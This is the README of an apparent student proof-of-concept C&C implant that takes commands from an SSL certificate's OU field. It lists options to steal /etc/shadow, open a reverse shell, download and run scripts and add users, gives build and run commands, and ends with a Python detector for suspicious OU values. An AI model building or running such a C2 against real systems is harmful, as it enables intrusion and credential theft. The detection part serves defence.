Simple C&C example in assembly that retrieves commands from the Organizational Unit (OU) field in an SSL certificate
Definitely far from being really done, but a cool proof-of-concept. This was my final project for CSC 314 @ DSU.
To make the attacker's host look inconspicuous, the commands are carried in the OU field, and each command is a single character that represents an action. The supported actions are:
/etc/shadow, will be posted & saved to our server
Attacker Server:
ubuntu@attacker:~$ ./gencert.py your.domain
1: steal /etc/shadow
2: spawn reverse shell
3: download & execute script
4: create new user
option > 1
ubuntu@attacker:~$ go build server.go
ubuntu@attacker:~$ sudo ./server
Victim Server:
root@victim:~$ cd cnc && make
root@victim:~$ ./cnc
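Because the command sits in the certificate's subject OU, that field can be checked on the defending side. The following is an added detection example, not part of the original project: it parses constructed subject strings and flags servers whose OU is a single character or differs between sightings. The function names, sample data and one-character threshold are assumptions.

```python
from collections import defaultdict

# Constructed sightings: (server name, certificate subject DN string).
# All names and values are invented for this example.
SIGHTINGS = [
    ("shop.example", "CN=shop.example,OU=Web Services,O=Example Corp,C=US"),
    ("your.domain", "CN=your.domain,OU=1,O=Example Widgets,C=US"),
    ("your.domain", "CN=your.domain,OU=3,O=Example Widgets,C=US"),
    ("mail.example", "CN=mail.example,OU=Ops\\, EU,O=Example Corp,C=US"),
]

def parse_dn(dn):
    """Return {attribute: [values]} for a comma-separated DN. Backslash escapes
    are honoured; hex-pair escapes and multi-valued RDNs ("+") are not handled."""
    attrs, cur, i = defaultdict(list), [], 0
    def flush():
        key, sep, value = "".join(cur).partition("=")
        if sep:
            attrs[key.strip().upper()].append(value.strip())
        cur.clear()
    while i < len(dn):
        if dn[i] == "\\" and i + 1 < len(dn):
            cur.append(dn[i + 1])  # keep the escaped character literally
            i += 2
            continue
        if dn[i] == ",":
            flush()  # unescaped comma ends the current attribute
        else:
            cur.append(dn[i])
        i += 1
    flush()
    return attrs

def flag_servers(sightings, max_len=1):
    """Return {server: [reasons]} for OU values that look like command slots."""
    seen = defaultdict(set)
    for server, dn in sightings:
        seen[server].update(parse_dn(dn).get("OU", []))
    findings = {}
    for server, ous in seen.items():
        reasons = []
        short = sorted(ou for ou in ous if len(ou) <= max_len)
        if short:
            reasons.append("short OU: " + ", ".join(short))
        if len(ous) > 1:  # assumption: a new command means a reissued certificate
            reasons.append("OU differs between certificates: " + ", ".join(sorted(ous)))
        if reasons:
            findings[server] = reasons
    return findings
```

Both heuristics will also match some legitimate certificates, so treat a hit as a lead to correlate with other telemetry and not as a verdict.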